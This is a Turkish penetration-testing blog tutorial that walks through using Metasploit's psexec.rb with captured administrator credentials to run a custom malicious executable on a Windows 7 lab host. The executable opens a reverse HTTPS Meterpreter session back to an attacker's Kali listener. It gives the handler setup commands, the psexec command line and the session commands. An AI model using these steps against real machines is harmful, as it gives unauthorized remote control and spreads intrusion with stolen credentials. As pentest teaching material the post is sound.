MSF psexec Betiği, Özel Olarak Hazırlanmış Zararlı Uygulama ve Elde Edilen Kimlik Bilgileri ile Windows Bir Bilgisayarlara Meterpreter Bağlantısı Elde Edilmesi

0
233
views
Sızma testleri sırasında, bir şekilde elde edilen kimlik bilgileri (kullanıcı adı ve parola) kullanılarak Windows bilgisayarlara erişim sağlanmaya çalışılır. Bu yazıda erişim bilgileri (IP, kullanıcı adı ve parolası) elde edilmiş bir Windows bilgisayara MSF psexec aracı ile özel olarak hazırlanmış bir zararlı uygulama kullanılarak Meterpreter bağlantısı gerçekleştirilecektir.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

Bu yazıda kullanılacak Kali bilgisayarın IP adresi 10.0.0.50, kurbana ait Windows 7 makinenin IP adresi ise 10.0.0.100 olduğu ve Windows 7 bilgisayarda yerel yönetici olan hesabın kullanıcı adının “Yonetici”, parolasının ise “Aa123456” olarak tespit edildiğini varsayalım.

Meterpreter komut satırı elde etmek için ve saldırgana ait Kali bilgisayara ters HTTPS Meterpreter bağlantısı kuracak olan zararlı bir uygulama dosyasının oluşturulduğunu ve /root/ dizinine kaydedildiğini varsayalım. Bu uygulama MSF psexec aracına parametre olarak verilecek ve çalışması sağlanacaktır. MSF psexec aracının temel kullanımı aşağıdaki gibidir.

/usr/share/metasploit-framework/tools/psexec.rb

obtaining-meterpreter-session-by-using-obtained-authentication-informations-and-custom-exe-via-msf-psexec-ruby-tool-01

Oluşturulan uygulamanın gerçekleştireceği ters HTTPS Meterpreter bağlantısını dinleyecek olan MSF multi-handler istismar modülü aşağıdaki gibi ayarlanabilir.

use exploit/multi/handler
show options
set PAYLOAD windows/meterpreter/reverse_https
set ExitOnSession false
set LHOST 10.0.0.50
set LPORT 443
exploit -j

obtaining-meterpreter-session-by-using-obtained-authentication-informations-and-custom-exe-via-msf-psexec-ruby-tool-02

MSF psexec aracı aşağıdaki gibi çalıştırılabilir.

/usr/share/metasploit-framework/tools/psexec.rb 10.0.0.100 /root/ZararliYazilim.exe Yonetici Aa123456

obtaining-meterpreter-session-by-using-obtained-authentication-informations-and-custom-exe-via-msf-psexec-ruby-tool-03

Böylece, MSF multi-handler istismar modülü üzerinde gelen talep yakalanmıştır.

sessions
sessions -i 1

obtaining-meterpreter-session-by-using-obtained-authentication-informations-and-custom-exe-via-msf-psexec-ruby-tool-04

Not: MSF psexec aracına parametre olarak özel olarak hazırlanmış zararlı bir yazılım verilmesi yöntemi ile elde edilen meterpreter bağlantısı çok sağlıklı çalışmamaktadır. Bu sebeple, başka yöntemlerin tercih edilmesi tavsiye edilmektedir.

 

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.